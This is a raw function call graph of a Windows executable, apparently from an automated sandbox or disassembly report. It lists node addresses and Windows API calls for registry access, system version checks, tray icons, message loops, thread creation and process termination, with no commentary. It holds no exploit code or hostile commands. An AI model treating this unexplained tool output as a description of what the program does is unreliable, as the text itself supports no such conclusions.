100194->100221 100201 1736df 100195->100201 100202 1b3e20 100195->100202 100197 1b3def 100233 18f1c6 40 API calls 100197->100233 100198->100190 100206 1b3d7a 100199->100206 100207 1b3d99 SetFocus 100199->100207 100209 1736ea 100201->100209 100210 173779 100201->100210 100202->100184 100236 1d1367 8 API calls 100202->100236 100203 1b3e4d 100203->100184 100203->100190 100206->100209 100211 1b3d83 100206->100211 100207->100190 100208 17373a 100229 17572c DeleteObject DestroyWindow 100208->100229 100209->100184 100234 17388e Shell_NotifyIconW ___scrt_fastfail 100209->100234 100230 1737a6 75 API calls ___scrt_fastfail 100210->100230 100231 172f24 10 API calls 100211->100231 100216 173789 100216->100190 100218 1b3e14 100235 1738f2 60 API calls ___scrt_fastfail 100218->100235 100220->100184 100222 18fd59 100221->100222 100223 18fcd3 ___scrt_fastfail 100221->100223 100222->100190 100238 175f59 100223->100238 100225 18fd42 KillTimer SetTimer 100225->100222 100226 18fcfa 100226->100225 100227 1cfdcb Shell_NotifyIconW 100226->100227 100227->100225 100228->100208 100229->100190 100230->100216 100231->100190 100232->100197 100233->100209 100234->100218 100235->100220 100236->100220 100237->100203 100239 175f76 100238->100239 100258 176058 100238->100258 100240 177a14 8 API calls 100239->100240 100241 175f84 100240->100241 100242 175f91 100241->100242 100243 1b5101 LoadStringW 100241->100243 100244 1784b7 8 API calls 100242->100244 100246 1b511b 100243->100246 100245 175fa6 100244->100245 100247 175fb3 100245->100247 100248 1b5137 100245->100248 100250 17be6d 8 API calls 100246->100250 100254 175fd9 ___scrt_fastfail 100246->100254 100247->100246 100249 175fbd 100247->100249 100248->100254 100255 1b517a 100248->100255 100257 17bf07 8 API calls 100248->100257 100251 1765a4 8 API calls 100249->100251 100250->100254 100252 175fcb 100251->100252 100253 177af4 8 API calls 100252->100253 100253->100254 100256 17603e Shell_NotifyIconW 100254->100256 100269 18fe8f 51 API calls 100255->100269 100256->100258 100259 1b5161 100257->100259 100258->100226 100268 1da265 9 API calls 100259->100268 100262 1b5199 100264 1765a4 8 API calls 100262->100264 100263 1b516c 100265 177af4 8 API calls 100263->100265 100266 1b51aa 100264->100266 100265->100255 100267 1765a4 8 API calls 100266->100267 100267->100254 100268->100263 100269->100262 97576 17105b 97581 17522e 97576->97581 97578 17106a 97612 190433 29 API calls __onexit 97578->97612 97580 171074 97582 17523e __wsopen_s 97581->97582 97613 17bf07 97582->97613 97586 1752fd 97625 1751bf 97586->97625 97593 17bf07 8 API calls 97594 17532e 97593->97594 97595 17bceb 8 API calls 97594->97595 97596 175337 RegOpenKeyExW 97595->97596 97597 1b4bc0 RegQueryValueExW 97596->97597 97601 175359 97596->97601 97598 1b4bdd 97597->97598 97599 1b4c56 RegCloseKey 97597->97599 97600 19019b 8 API calls 97598->97600 97599->97601 97610 1b4c68 _wcslen 97599->97610 97602 1b4bf6 97600->97602 97601->97578 97646 1741a6 97602->97646 97605 1b4c1e 97606 1784b7 8 API calls 97605->97606 97607 1b4c38 messages 97606->97607 97607->97599 97609 17684e 8 API calls 97609->97610 97610->97601 97610->97609 97611 17627c 8 API calls 97610->97611 97649 17b25f 97610->97649 97611->97610 97612->97580 97614 19019b 8 API calls 97613->97614 97615 17bf1c 97614->97615 97616 19016b 8 API calls 97615->97616 97617 1752f4 97616->97617 97618 17551b 97617->97618 97655 1b22f0 97618->97655 97621 17b25f 8 API calls 97622 17554e 97621->97622 97657 17557e 97622->97657 97624 175558 97624->97586 97626 1b22f0 __wsopen_s 97625->97626 97627 1751cc GetFullPathNameW 97626->97627 97628 1751ee 97627->97628 97629 1784b7 8 API calls 97628->97629 97630 17520c 97629->97630 97631 1765a4 97630->97631 97632 1b5629 97631->97632 97633 1765bb 97631->97633 97634 19016b 8 API calls 97632->97634 97671 1765cc 97633->97671 97637 1b5633 _wcslen 97634->97637 97636 175316 97640 17684e 97636->97640 97638 19019b 8 API calls 97637->97638 97639 1b566c __fread_nolock 97638->97639 97641 17685d 97640->97641 97645 17687e __fread_nolock 97640->97645 97643 19019b 8 API calls 97641->97643 97642 19016b 8 API calls 97644 175325 97642->97644 97643->97645 97644->97593 97645->97642 97647 19016b 8 API calls 97646->97647 97648 1741b8 RegQueryValueExW 97647->97648 97648->97605 97648->97607 97650 17b26e _wcslen 97649->97650 97651 19019b 8 API calls 97650->97651 97652 17b296 __fread_nolock 97651->97652 97653 19016b 8 API calls 97652->97653 97654 17b2ac 97653->97654 97654->97610 97656 175528 GetModuleFileNameW 97655->97656 97656->97621 97658 1b22f0 __wsopen_s 97657->97658 97659 17558b GetFullPathNameW 97658->97659 97660 1755c5 97659->97660 97661 1755aa 97659->97661 97663 17bceb 8 API calls 97660->97663 97662 1784b7 8 API calls 97661->97662 97664 1755b6 97662->97664 97663->97664 97667 1779ed 97664->97667 97668 1779fb 97667->97668 97669 1796d9 8 API calls 97668->97669 97670 1755c2 97669->97670 97670->97624 97672 1765dc _wcslen 97671->97672 97673 1b568b 97672->97673 97674 1765ef 97672->97674 97675 19016b 8 API calls 97673->97675 97681 177cb3 97674->97681 97677 1b5695 97675->97677 97679 19019b 8 API calls 97677->97679 97678 1765fc __fread_nolock 97678->97636 97680 1b56c5 __fread_nolock 97679->97680 97682 177cc9 97681->97682 97685 177cc4 __fread_nolock 97681->97685 97683 19019b 8 API calls 97682->97683 97684 1b64be 97682->97684 97683->97685 97684->97684 97685->97678 97686 171098 97691 175d78 97686->97691 97690 1710a7 97692 17bf07 8 API calls 97691->97692 97693 175d8f GetVersionExW 97692->97693 97694 1784b7 8 API calls 97693->97694 97695 175ddc 97694->97695 97696 1796d9 8 API calls 97695->97696 97710 175e12 97695->97710 97697 175e06 97696->97697 97699 1779ed 8 API calls 97697->97699 97698 175ecc GetCurrentProcess IsWow64Process 97700 175ee8 97698->97700 97699->97710 97701 175f00 LoadLibraryA 97700->97701 97702 1b50f2 GetSystemInfo 97700->97702 97703 175f11 GetProcAddress 97701->97703 97704 175f4d GetSystemInfo 97701->97704 97703->97704 97707 175f21 GetNativeSystemInfo 97703->97707 97705 175f27 97704->97705 97708 17109d 97705->97708 97709 175f2b FreeLibrary 97705->97709 97706 1b50ad 97707->97705 97711 190433 29 API calls __onexit 97708->97711 97709->97708 97710->97698 97710->97706 97711->97690 100270 1c3fb3 100299 17ee60 messages 100270->100299 100271 17f1c1 PeekMessageW 100271->100299 100272 17eeb7 GetInputState 100272->100271 100272->100299 100273 1c3271 TranslateAcceleratorW 100273->100299 100275 17f223 TranslateMessage DispatchMessageW 100276 17f23f PeekMessageW 100275->100276 100276->100299 100277 17f0b4 timeGetTime 100277->100299 100278 17f25f Sleep 100278->100299 100279 1c4127 Sleep 100295 1c4004 100279->100295 100282 1c338d timeGetTime 100338 18a9e5 9 API calls 100282->100338 100283 1ddc9c 46 API calls 100283->100295 100285 1c41be GetExitCodeProcess 100286 1c41ea CloseHandle 100285->100286 100287 1c41d4 WaitForSingleObject 100285->100287 100286->100295 100287->100286 100287->100299 100289 20331e GetForegroundWindow 100289->100295 100290 1c3cf5 100292 17f085 100290->100292 100291 1c425c Sleep 100291->100299 100295->100283 100295->100285 100295->100289 100295->100290 100295->100291 100295->100299 100341 1f5fb5 8 API calls 100295->100341 100342 1df1a7 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 100295->100342 100343 18f27e timeGetTime 100295->100343 100298 1802f0 230 API calls 100298->100299 100299->100271 100299->100272 100299->100273 100299->100275 100299->100276 100299->100277 100299->100278 100299->100279 100299->100282 100299->100292 100299->100295 100299->100298 100300 182ad0 230 API calls 100299->100300 100302 17f400 100299->100302 100309 17f680 100299->100309 100332 18f2a5 100299->100332 100337 18f27e timeGetTime 100299->100337 100339 1e4384 8 API calls 100299->100339 100340 1e3ef6 81 API calls __wsopen_s 100299->100340 100300->100299 100303 17f433 100302->100303 100304 17f41f 100302->100304 100376 1e3ef6 81 API calls __wsopen_s 100303->100376 100344 17e910 100304->100344 100307 17f42a 100307->100299 100308 1c4528 100308->100308 100310 17f6c0 100309->100310 100326 17f78c messages 100310->100326 100385 1905d2 5 API calls __Init_thread_wait 100310->100385 100311 1802f0 230 API calls 100311->100326 100314 1c457d 100316 17bf07 8 API calls 100314->100316 100314->100326 100315 17bf07 8 API calls 100315->100326 100317 1c4597 100316->100317 100386 190433 29 API calls __onexit 100317->100386 100318 17bdc1 39 API calls 100318->100326 100321 1c45a1 100387 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100321->100387 100325 17be6d 8 API calls 100325->100326 100326->100311 100326->100315 100326->100318 100326->100325 100327 17fa91 100326->100327 100328 181c50 8 API calls 100326->100328 100329 1e3ef6 81 API calls 100326->100329 100384 18b2d6 230 API calls 100326->100384 100388 1905d2 5 API calls __Init_thread_wait 100326->100388 100389 190433 29 API calls __onexit 100326->100389 100390 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 100326->100390 100391 1f5131 101 API calls 100326->100391 100392 1f721e 230 API calls 100326->100392 100327->100299 100328->100326 100329->100326 100333 18f2b8 100332->100333 100334 18f2c1 100332->100334 100333->100299 100334->100333 100335 18f2e5 IsDialogMessageW 100334->100335 100336 1cf83b GetClassLongW 100334->100336 100335->100333 100335->100334 100336->100334 100336->100335 100337->100299 100338->100299 100339->100299 100340->100299 100341->100295 100342->100295 100343->100295 100345 1802f0 230 API calls 100344->100345 100346 17e94d 100345->100346 100347 17ed85 100346->100347 100348 17e9bb messages 100346->100348 100350 17ea73 100346->100350 100356 17eb68 100346->100356 100359 19016b 8 API calls 100346->100359 100362 1c3176 100346->100362 100371 17ead9 __fread_nolock messages 100346->100371 100347->100348 100360 19019b 8 API calls 100347->100360 100348->100307 100350->100347 100351 17ea7e 100350->100351 100353 19016b 8 API calls 100351->100353 100352 17ecaf 100354 17ecc4 100352->100354 100355 1c3167 100352->100355 100365 17ea85 __fread_nolock 100353->100365 100357 19016b 8 API calls 100354->100357 100382 1f6062 8 API calls 100355->100382 100361 19019b 8 API calls 100356->100361 100369 17eb1a 100357->100369 100359->100346 100360->100365 100361->100371 100383 1e3ef6 81 API calls __wsopen_s 100362->100383 100363 19016b 8 API calls 100364 17eaa6 100363->100364 100364->100371 100377 17d210 230 API calls 100364->100377 100365->100363 100365->100364 100367 1c3156 100381 1e3ef6 81 API calls __wsopen_s 100367->100381 100369->100307 100371->100352 100371->100367 100371->100369 100372 1c3131 100371->100372 100374 1c310f 100371->100374 100378 174485 230 API calls 100371->100378 100380 1e3ef6 81 API calls __wsopen_s 100372->100380 100379 1e3ef6 81 API calls __wsopen_s 100374->100379 100376->100308 100377->100371 100378->100371 100379->100369 100380->100369 100381->100369 100382->100362 100383->100348 100384->100326 100385->100314 100386->100321 100387->100326 100388->100326 100389->100326 100390->100326 100391->100326 100392->100326 97712 19078b 97713 190797 ___scrt_is_nonwritable_in_current_image 97712->97713 97742 190241 97713->97742 97715 19079e 97716 1908f1 97715->97716 97719 1907c8 97715->97719 97783 190bcf IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 97716->97783 97718 1908f8 97776 1951e2 97718->97776 97728 190807 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 97719->97728 97753 1a280d 97719->97753 97726 1907e7 97732 190868 97728->97732 97779 1951aa 38 API calls 2 library calls 97728->97779 97730 19086e 97765 1732a2 97730->97765 97761 190ce9 97732->97761 97736 19088a 97736->97718 97737 19088e 97736->97737 97738 190897 97737->97738 97781 195185 28 API calls _abort 97737->97781 97782 1903d0 13 API calls 2 library calls 97738->97782 97741 19089f 97741->97726 97743 19024a 97742->97743 97785 190a28 IsProcessorFeaturePresent 97743->97785 97745 190256 97786 193024 10 API calls 3 library calls 97745->97786 97747 19025b 97752 19025f 97747->97752 97787 1a26a7 97747->97787 97750 190276 97750->97715 97752->97715 97755 1a2824 97753->97755 97754 190e1c _ValidateLocalCookies 5 API calls 97756 1907e1 97754->97756 97755->97754 97756->97726 97757 1a27b1 97756->97757 97758 1a27e0 97757->97758 97759 190e1c _ValidateLocalCookies 5 API calls 97758->97759 97760 1a2809 97759->97760 97760->97728 97838 1926d0 97761->97838 97764 190d0f 97764->97730 97766 1732ae IsThemeActive 97765->97766 97767 173309 97765->97767 97840 1952d3 97766->97840 97780 190d22 GetModuleHandleW 97767->97780 97769 1732d9 97846 195339 97769->97846 97771 1732e0 97853 17326d SystemParametersInfoW SystemParametersInfoW 97771->97853 97773 1732e7 97854 173312 97773->97854 98894 194f5f 97776->98894 97779->97732 97780->97736 97781->97738 97782->97741 97783->97718 97785->97745 97786->97747 97791 1ad596 97787->97791 97790 19304d 8 API calls 3 library calls 97790->97752 97794 1ad5b3 97791->97794 97795 1ad5af 97791->97795 97793 190268 97793->97750 97793->97790 97794->97795 97797 1a4f8b 97794->97797 97809 190e1c 97795->97809 97798 1a4f97 ___scrt_is_nonwritable_in_current_image 97797->97798 97816 1a32ee EnterCriticalSection 97798->97816 97800 1a4f9e 97817 1a543f 97800->97817 97802 1a4fad 97808 1a4fbc 97802->97808 97830 1a4e1f 29 API calls 97802->97830 97805 1a4fb7 97831 1a4ed5 GetStdHandle GetFileType 97805->97831 97806 1a4fcd __fread_nolock 97806->97794 97832 1a4fd8 LeaveCriticalSection _abort 97808->97832 97810 190e25 97809->97810 97811 190e27 IsProcessorFeaturePresent 97809->97811 97810->97793 97813 190fee 97811->97813 97837 190fb1 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 97813->97837 97815 1910d1 97815->97793 97816->97800 97818 1a544b ___scrt_is_nonwritable_in_current_image 97817->97818 97819 1a5458 97818->97819 97820 1a546f 97818->97820 97834 19f669 20 API calls __dosmaperr 97819->97834 97833 1a32ee EnterCriticalSection 97820->97833 97823 1a545d 97835 1a2b7c 26 API calls pre_c_initialization 97823->97835 97825 1a5467 __fread_nolock 97825->97802 97826 1a54a7 97836 1a54ce LeaveCriticalSection _abort 97826->97836 97828 1a547b 97828->97826 97829 1a5390 __wsopen_s 21 API calls 97828->97829 97829->97828 97830->97805 97831->97808 97832->97806 97833->97828 97834->97823 97835->97825 97836->97825 97837->97815 97839 190cfc GetStartupInfoW 97838->97839 97839->97764 97841 1952df ___scrt_is_nonwritable_in_current_image 97840->97841 97903 1a32ee EnterCriticalSection 97841->97903 97843 1952ea pre_c_initialization 97904 19532a 97843->97904 97845 19531f __fread_nolock 97845->97769 97847 19535f 97846->97847 97848 195345 97846->97848 97847->97771 97848->97847 97908 19f669 20 API calls __dosmaperr 97848->97908 97850 19534f 97909 1a2b7c 26 API calls pre_c_initialization 97850->97909 97852 19535a 97852->97771 97853->97773 97855 173322 __wsopen_s 97854->97855 97856 17bf07 8 API calls 97855->97856 97857 17332e GetCurrentDirectoryW 97856->97857 97910 174f60 97857->97910 97903->97843 97907 1a3336 LeaveCriticalSection 97904->97907 97906 195331 97906->97845 97907->97906 97908->97850 97909->97852 97911 17bf07 8 API calls 97910->97911 97912 174f76 97911->97912 98034 1760f5 97912->98034 97914 174f94 97915 17bceb 8 API calls 97914->97915 97916 174fa8 97915->97916 98048 17be6d 97916->98048 97918 174fb3 98052 1788e8 97918->98052 97921 17b25f 8 API calls 97922 174fcc 97921->97922 98055 17bdc1 97922->98055 97924 174fdc 97925 17b25f 8 API calls 97924->97925 97926 175002 97925->97926 97927 17bdc1 39 API calls 97926->97927 97928 175011 97927->97928 97929 17bf07 8 API calls 97928->97929 97930 17502f 97929->97930 98059 175151 97930->98059 97934 175049 97935 175053 97934->97935 97936 1b4afd 97934->97936 97937 194db8 _strftime 40 API calls 97935->97937 97938 175151 8 API calls 97936->97938 97940 17505e 97937->97940 97939 1b4b11 97938->97939 97942 175151 8 API calls 97939->97942 97940->97939 97941 175068 97940->97941 97943 194db8 _strftime 40 API calls 97941->97943 97944 1b4b2d 97942->97944 97945 175073 97943->97945 97947 17551b 10 API calls 97944->97947 97945->97944 97946 17507d 97945->97946 97948 194db8 _strftime 40 API calls 97946->97948 97949 1b4b50 97947->97949 97950 175088 97948->97950 97951 175151 8 API calls 97949->97951 97952 175092 97950->97952 97953 1b4b79 97950->97953 97956 1b4b5c 97951->97956 97954 1750b5 97952->97954 97957 17be6d 8 API calls 97952->97957 97955 175151 8 API calls 97953->97955 97959 1b4bb4 97954->97959 98075 177d51 97954->98075 97958 1b4b97 97955->97958 97960 17be6d 8 API calls 97956->97960 97961 1750a8 97957->97961 97962 17be6d 8 API calls 97958->97962 97964 1b4b6a 97960->97964 97965 175151 8 API calls 97961->97965 97966 1b4ba5 97962->97966 97968 175151 8 API calls 97964->97968 97965->97954 97969 175151 8 API calls 97966->97969 97968->97953 97969->97959 97973 1788e8 8 API calls 97975 1750ee 97973->97975 97974 178a10 8 API calls 97974->97975 97975->97973 97975->97974 97976 175132 97975->97976 97977 175151 8 API calls 97975->97977 97977->97975 98035 176102 __wsopen_s 98034->98035 98036 1784b7 8 API calls 98035->98036 98037 176134 98035->98037 98036->98037 98041 17616a 98037->98041 98097 17627c 98037->98097 98039 176238 98040 17626d 98039->98040 98042 17b25f 8 API calls 98039->98042 98040->97914 98041->98039 98044 17b25f 8 API calls 98041->98044 98046 17684e 8 API calls 98041->98046 98047 17627c 8 API calls 98041->98047 98043 176261 98042->98043 98045 17684e 8 API calls 98043->98045 98044->98041 98045->98040 98046->98041 98047->98041 98049 17be90 __fread_nolock 98048->98049 98050 17be81 98048->98050 98049->97918 98050->98049 98051 19019b 8 API calls 98050->98051 98051->98049 98053 19016b 8 API calls 98052->98053 98054 174fbf 98053->98054 98054->97921 98056 17bdcc 98055->98056 98057 17bdfb 98056->98057 98100 17bf39 39 API calls 98056->98100 98057->97924 98060 17515b 98059->98060 98061 175179 98059->98061 98062 17503b 98060->98062 98064 17be6d 8 API calls 98060->98064 98063 1784b7 8 API calls 98061->98063 98065 194db8 98062->98065 98063->98062 98064->98062 98066 194e3b 98065->98066 98067 194dc6 98065->98067 98103 194e4d 40 API calls 4 library calls 98066->98103 98074 194deb 98067->98074 98101 19f669 20 API calls __dosmaperr 98067->98101 98070 194e48 98070->97934 98071 194dd2 98102 1a2b7c 26 API calls pre_c_initialization 98071->98102 98073 194ddd 98073->97934 98074->97934 98076 177d59 98075->98076 98077 19016b 8 API calls 98076->98077 98078 177d67 98077->98078 98104 178386 98078->98104 98081 1783b0 98107 17c700 98081->98107 98083 1783c0 98084 19019b 8 API calls 98083->98084 98085 1750d3 98083->98085 98084->98085 98086 178a10 98085->98086 98087 178a26 98086->98087 98088 1b6728 98087->98088 98094 178a30 98087->98094 98120 18b71c 8 API calls 98088->98120 98089 1b6735 98121 17b3fe 98089->98121 98091 178b4b 98091->97975 98094->98089 98094->98091 98095 178b44 98094->98095 98096 19016b 8 API calls 98095->98096 98096->98091 98098 17c269 8 API calls 98097->98098 98099 176287 98098->98099 98099->98037 98100->98057 98101->98071 98102->98073 98103->98070 98105 19016b 8 API calls 98104->98105 98106 1750c5 98105->98106 98106->98081 98108 17c70b 98107->98108 98109 1c1228 98108->98109 98114 17c713 messages 98108->98114 98110 19016b 8 API calls 98109->98110 98111 1c1234 98110->98111 98111->98111 98112 17c71a 98112->98083 98114->98112 98115 17c780 98114->98115 98118 17c78b messages 98115->98118 98116 17c7c6 messages 98116->98114 98118->98116 98119 18e29c 8 API calls messages 98118->98119 98119->98116 98120->98089 98122 17b412 98121->98122 98123 17b40c 98121->98123 98123->98122 98895 194f6b _abort 98894->98895 98896 194f72 98895->98896 98897 194f84 98895->98897 98933 1950b9 GetModuleHandleW 98896->98933 98918 1a32ee EnterCriticalSection 98897->98918 98900 194f77 98900->98897 98934 1950fd GetModuleHandleExW 98900->98934 98901 195029 98922 195069 98901->98922 98904 194f8b 98904->98901 98906 195000 98904->98906 98919 1a2538 98904->98919 98910 195018 98906->98910 98911 1a27b1 _abort 5 API calls 98906->98911 98908 195072 98942 1b20c9 5 API calls _ValidateLocalCookies 98908->98942 98909 195046 98925 195078 98909->98925 98912 1a27b1 _abort 5 API calls 98910->98912 98911->98910 98912->98901 98918->98904 98943 1a2271 98919->98943 98962 1a3336 LeaveCriticalSection 98922->98962 98924 195042 98924->98908 98924->98909 98963 1a399c 98925->98963 98928 1950a6 98931 1950fd _abort 8 API calls 98928->98931 98929 195086 GetPEB 98929->98928 98930 195096 GetCurrentProcess TerminateProcess 98929->98930 98930->98928 98932 1950ae ExitProcess 98931->98932 98933->98900 98935 19514a 98934->98935 98936 195127 GetProcAddress 98934->98936 98938 195159 98935->98938 98939 195150 FreeLibrary 98935->98939 98937 19513c 98936->98937 98937->98935 98940 190e1c _ValidateLocalCookies 5 API calls 98938->98940 98939->98938 98941 194f83 98940->98941 98941->98897 98946 1a2220 98943->98946 98945 1a2295 98945->98906 98947 1a222c ___scrt_is_nonwritable_in_current_image 98946->98947 98954 1a32ee EnterCriticalSection 98947->98954 98949 1a223a 98955 1a22c1 98949->98955 98953 1a2258 __fread_nolock 98953->98945 98954->98949 98958 1a22e9 98955->98958 98960 1a22e1 98955->98960 98956 190e1c _ValidateLocalCookies 5 API calls 98957 1a2247 98956->98957 98961 1a2265 LeaveCriticalSection _abort 98957->98961 98959 1a2d58 _free 20 API calls 98958->98959 98958->98960 98959->98960 98960->98956 98961->98953 98962->98924 98964 1a39c1 98963->98964 98965 1a39b7 98963->98965 98970 1a3367 5 API calls 2 library calls 98964->98970 98967 190e1c _ValidateLocalCookies 5 API calls 98965->98967 98968 195082 98967->98968 98968->98928 98968->98929 98969 1a39d8 98969->98965 98970->98969 98971 171044 98976 172735 98971->98976 98973 17104a 99012 190433 29 API calls __onexit 98973->99012 98975 171054 99013 1729da 98976->99013 98980 1727ac 98981 17bf07 8 API calls 98980->98981 98982 1727b6 98981->98982 98983 17bf07 8 API calls 98982->98983 98984 1727c0 98983->98984 98985 17bf07 8 API calls 98984->98985 98986 1727ca 98985->98986 98987 17bf07 8 API calls 98986->98987 98988 172808 98987->98988 98989 17bf07 8 API calls 98988->98989 98990 1728d4 98989->98990 99023 172d5e 98990->99023 98994 172906 98995 17bf07 8 API calls 98994->98995 98996 172910 98995->98996 99044 1830e0 98996->99044 98998 17293b 99054 1730ed 98998->99054 99000 172957 99001 172967 GetStdHandle 99000->99001 99002 1b39c1 99001->99002 99003 1729bc 99001->99003 99002->99003 99004 1b39ca 99002->99004 99006 1729c9 OleInitialize 99003->99006 99005 19016b 8 API calls 99004->99005 99007 1b39d1 99005->99007 99006->98973 99061 1e09d9 InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99007->99061 99009 1b39da 99062 1e1200 CreateThread 99009->99062 99011 1b39e6 CloseHandle 99011->99003 99012->98975 99063 172a33 99013->99063 99016 172a33 8 API calls 99017 172a12 99016->99017 99018 17bf07 8 API calls 99017->99018 99019 172a1e 99018->99019 99020 1784b7 8 API calls 99019->99020 99021 17276b 99020->99021 99022 173205 6 API calls 99021->99022 99022->98980 99024 17bf07 8 API calls 99023->99024 99025 172d6e 99024->99025 99026 17bf07 8 API calls 99025->99026 99027 172d76 99026->99027 99028 17bf07 8 API calls 99027->99028 99029 172d91 99028->99029 99030 19016b 8 API calls 99029->99030 99031 1728de 99030->99031 99032 17318c 99031->99032 99033 17319a 99032->99033 99034 17bf07 8 API calls 99033->99034 99035 1731a5 99034->99035 99036 17bf07 8 API calls 99035->99036 99037 1731b0 99036->99037 99038 17bf07 8 API calls 99037->99038 99039 1731bb 99038->99039 99040 17bf07 8 API calls 99039->99040 99041 1731c6 99040->99041 99042 19016b 8 API calls 99041->99042 99043 1731d8 RegisterWindowMessageW 99042->99043 99043->98994 99045 183121 99044->99045 99051 1830fd 99044->99051 99070 1905d2 5 API calls __Init_thread_wait 99045->99070 99046 18310e 99046->98998 99049 18312b 99049->99051 99071 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99049->99071 99050 189ec7 99050->99046 99073 190588 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99050->99073 99051->99046 99072 1905d2 5 API calls __Init_thread_wait 99051->99072 99055 1b3c69 99054->99055 99056 1730fd 99054->99056 99074 1e3b63 8 API calls 99055->99074 99057 19016b 8 API calls 99056->99057 99059 173105 99057->99059 99059->99000 99060 1b3c74 99061->99009 99062->99011 99075 1e11e6 14 API calls 99062->99075 99064 17bf07 8 API calls 99063->99064 99065 172a3e 99064->99065 99066 17bf07 8 API calls 99065->99066 99067 172a46 99066->99067 99068 17bf07 8 API calls 99067->99068 99069 172a08 99068->99069 99069->99016 99070->99049 99071->99051 99072->99050 99073->99046 99074->99060 99076 18230c 99077 182315 __fread_nolock 99076->99077 99079 1c7487 99077->99079 99082 182366 99077->99082 99083 19016b 8 API calls 99077->99083 99084 181fa7 __fread_nolock 99077->99084 99087 19019b 8 API calls 99077->99087 99088 178e70 99077->99088 99111 17662b 8 API calls __fread_nolock 99079->99111 99081 1c7493 99081->99084 99086 17be6d 8 API calls 99081->99086 99085 177cb3 8 API calls 99082->99085 99083->99077 99085->99084 99086->99084 99087->99077 99089 178e85 99088->99089 99105 178e82 99088->99105 99090 178e8d 99089->99090 99091 178ebb 99089->99091 99112 195556 26 API calls 99090->99112 99094 178ecd 99091->99094 99101 1b6b10 99091->99101 99103 1b6a29 99091->99103 99113 18fe8f 51 API calls 99094->99113 99095 178e9d 99098 19016b 8 API calls 99095->99098 99096 1b6b28 99096->99096 99100 178ea7 99098->99100 99102 17b25f 8 API calls 99100->99102 99115 195513 26 API calls 99101->99115 99102->99105 99104 19019b 8 API calls 99103->99104 99110 1b6aa2 99103->99110 99106 1b6a72 99104->99106 99105->99077 99107 19016b 8 API calls 99106->99107 99108 1b6a99 99107->99108 99109 17b25f 8 API calls 99108->99109 99109->99110 99114 18fe8f 51 API calls 99110->99114 99111->99081 99112->99095 99113->99095 99114->99101 99115->99096 100393 1c1a68 100394 1c1a70 100393->100394 100397 17d4e5 100393->100397 100431 1d79af 8 API calls __fread_nolock 100394->100431 100396 1c1a82 100432 1d7928 8 API calls __fread_nolock 100396->100432 100400 19016b 8 API calls 100397->100400 100399 1c1aac 100401 1802f0 230 API calls 100399->100401 100402 17d539 100400->100402 100403 1c1ad3 100401->100403 100423 17c2cd 100402->100423 100405 1c1ae7 100403->100405 100433 1f60a2 53 API calls _wcslen 100403->100433 100408 19016b 8 API calls 100419 17d61e messages 100408->100419 100409 1c1b04 100409->100397 100434 1d79af 8 API calls __fread_nolock 100409->100434 100411 17c34b 8 API calls 100421 17d95c messages 100411->100421 100412 17be6d 8 API calls 100412->100419 100413 17b3fe 8 API calls 100413->100419 100415 1c1f1c 100435 1d55d9 8 API calls messages 100415->100435 100416 1c1f37 100418 17c34b 8 API calls 100418->100419 100419->100412 100419->100413 100419->100415 100419->100416 100419->100418 100420 17d8c1 messages 100419->100420 100420->100411 100420->100421 100422 17d973 100421->100422 100430 18e284 8 API calls messages 100421->100430 100427 17c2dd 100423->100427 100424 17c2e5 100424->100408 100425 19016b 8 API calls 100425->100427 100426 17bf07 8 API calls 100426->100427 100427->100424 100427->100425 100427->100426 100428 17be6d 8 API calls 100427->100428 100429 17c2cd 8 API calls 100427->100429 100428->100427 100429->100427 100430->100421 100431->100396 100432->100399 100433->100409 100434->100409 100435->100416 99116 1a1e4c 99125 1ad1e0 GetEnvironmentStringsW 99116->99125 99119 1a1e64 99121 1a2d58 _free 20 API calls 99119->99121 99122 1a1e99 99121->99122 99123 1a1e6f 99124 1a2d58 _free 20 API calls 99123->99124 99124->99119 99126 1a1e5e 99125->99126 99127 1ad1f4 99125->99127 99126->99119 99132 1a1f70 26 API calls 3 library calls 99126->99132 99133 1a3bb0 99127->99133 99129 1ad208 __fread_nolock 99130 1a2d58 _free 20 API calls 99129->99130 99131 1ad222 FreeEnvironmentStringsW 99130->99131 99131->99126 99132->99123 99134 1a3bee 99133->99134 99138 1a3bbe pre_c_initialization 99133->99138 99141 19f669 20 API calls __dosmaperr 99134->99141 99136 1a3bd9 RtlAllocateHeap 99137 1a3bec 99136->99137 99136->99138 99137->99129 99138->99134 99138->99136 99140 19523d 7 API calls 2 library calls 99138->99140 99140->99138 99141->99137 99142 19f08e 99143 19f09a ___scrt_is_nonwritable_in_current_image 99142->99143 99144 19f0bb 99143->99144 99145 19f0a6 99143->99145 99155 19951d EnterCriticalSection 99144->99155 99161 19f669 20 API calls __dosmaperr 99145->99161 99148 19f0ab 99162 1a2b7c 26 API calls pre_c_initialization 99148->99162 99149 19f0c7 99156 19f0fb 99149->99156 99154 19f0b6 __fread_nolock 99155->99149 99164 19f126 99156->99164 99158 19f108 99159 19f0d4 99158->99159 99184 19f669 20 API calls __dosmaperr 99158->99184 99163 19f0f1 LeaveCriticalSection __fread_nolock 99159->99163 99161->99148 99162->99154 99163->99154 99165 19f14e 99164->99165 99166 19f134 99164->99166 99168 19dce5 __fread_nolock 26 API calls 99165->99168 99188 19f669 20 API calls __dosmaperr 99166->99188 99170 19f157 99168->99170 99169 19f139 99189 1a2b7c 26 API calls pre_c_initialization 99169->99189 99185 1a9799 99170->99185 99174 19f25b 99176 19f268 99174->99176 99183 19f20e 99174->99183 99175 19f1df 99177 19f1fc 99175->99177 99175->99183 99191 19f669 20 API calls __dosmaperr 99176->99191 99190 19f43f 31 API calls 4 library calls 99177->99190 99180 19f206 99181 19f144 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 99180->99181 99181->99158 99183->99181 99192 19f2bb 30 API calls 2 library calls 99183->99192 99184->99159 99193 1a9616 99185->99193 99187 19f173 99187->99174 99187->99175 99187->99181 99188->99169 99189->99181 99190->99180 99191->99181 99192->99181 99194 1a9622 ___scrt_is_nonwritable_in_current_image 99193->99194 99195 1a962a 99194->99195 99196 